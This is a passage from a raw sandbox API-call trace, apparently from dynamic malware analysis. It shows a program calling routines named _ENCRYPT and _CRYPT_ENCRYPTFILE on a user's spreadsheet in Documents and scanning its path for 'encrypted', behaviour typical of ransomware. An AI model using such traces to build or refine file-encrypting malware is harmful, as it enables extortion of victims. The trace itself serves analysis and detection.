hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.574] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.574] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.574] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.574] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0033.574] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.574] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0033.574] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0033.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.574] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.574] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.574] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.574] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c542c70, ftCreationTime.dwHighDateTime=0x1d5bccb, ftLastAccessTime.dwLowDateTime=0x14867a70, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x14867a70, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x4911, dwReserved0=0x0, dwReserved1=0x777648, cFileName="BN3xfsXKP2npRmT.ods", cAlternateFileName="BN3XFS~1.ODS")) returned 0x7c20c0 [0033.575] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.575] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.575] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c542c70, ftCreationTime.dwHighDateTime=0x1d5bccb, ftLastAccessTime.dwLowDateTime=0x14867a70, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x14867a70, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x4911, dwReserved0=0x0, dwReserved1=0x777648, cFileName="BN3xfsXKP2npRmT.ods", cAlternateFileName="BN3XFS~1.ODS")) returned 0x7c20c0 [0033.575] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0033.575] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.575] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BN3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xfsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fsXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sXKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XKP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KP2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="npRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pRmT.ods\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0033.578] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.578] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0033.578] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.578] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.578] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.578] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.578] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.578] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0033.578] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.578] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c542c70, ftCreationTime.dwHighDateTime=0x1d5bccb, ftLastAccessTime.dwLowDateTime=0x14867a70, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x14867a70, ftLastWriteTime.dwHighDateTime=0x1d5b728, 